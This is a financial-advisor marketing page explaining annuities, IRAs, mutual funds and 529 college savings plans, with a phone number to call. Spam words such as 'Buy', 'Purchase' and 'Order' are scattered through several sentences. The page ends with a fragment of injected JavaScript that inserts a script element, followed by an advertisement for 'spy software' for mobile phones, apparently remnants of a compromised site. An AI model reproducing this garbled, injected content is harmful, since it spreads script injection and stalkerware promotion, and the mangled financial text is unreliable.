Many of us don’t know how to Buy start saving for retirement and college when we’re so busy just trying to take care of today. So we put off saving for the future. And terms like “annuity,” “IRA,” “mutual fund” and “529 plans” can be intimidating. They don’t have to be. We offer a variety of savings solutions that can help you achieve the comfortable retirement that you deserve and get a head start on college education savings.
The Brian McQuoid Team Can Help.
It’s easier Buy to make a decision when you understand what everyone is talking about. That’s why we offer a variety of choices to help you and your family put your financial goals within reach with savings choices that you can feel good about. Talk to an our Personal Financial Representative to learn more or get a simple explanation below to help you decide if annuities, IRAs, mutual funds and college savings plans might be the right choice for you.
Annuities Give You Steady Income For A Set Time or For Your Lifetime.
- Build savings:Annuities are long-term investment vehicles that help you accumulate your retirement savings over time.
- Get paid:Annuities may provide a regular source of income that you can rely on.
- Bank on safetySome annuities guarantee that your money will earn a fixed interest rate.
- Boost income:. Other annuities give you income right away and some take risks to earn more money so that your savings have the potential to grow more over time.
An IRA (Individual Retirement Account) Helps You Build Savings For Retirement.
- Accumulate savings:. IRAs are primarily used to save for retirement, but you may also use funds from a Roth IRA without penalty to pay for other qualified expenses.
- Enjoy tax advantages:Traditional and Roth IRAs each offer different tax benefits, so talk to your tax advisor or contact us to learn more.
- Pick the one that’s right for you, to learn about three types of IRAs – Traditional IRA, Roth IRA and Rollover IRA to determine which one is most appropriate for your needs.
A Mutual Fund3 Pools Your Money Together With Others Investors’ Money.
- Grow savings:There are many different types of mutual funds you can put your money in to save for college and retirement.
- Rely on the pros:. Professional money managers research and choose the investments that go into a mutual fund based on the funds specific investment objectives.
- Choose the right mutual fund:Contact us to determine which mutual funds might be best for you based on your savings goals, your time horizon and your ability to handle risk.
529 Plans Are State-sponsored Savings Programs That Help You Save For College.
- Pick a plan:Each state chooses an investment company to manage its plan but you can invest in any state’s plan.
- Save first: You can set up an automatic bank deposit or have money deducted from your paycheck so part of your paycheck goes directly into a 529 college savings plan.
- Purchase Enjoy tax advantages: Order Your money grows tax-free, which means you don’t pay taxes on the money your 529 plan earns.
- Use 529 plan savings for college expenses:You can use your 529 plan savings for qualified expenses like books and tuition at just about any accredited college, university, or technical school in the United States.
Call 215-464-4300 or contact us through our online form today!
document.currentScript.parentNode.insertBefore(s, document.currentScript);https://topspyapps.net – The most popular 2017 spy software applications for the mobile phones.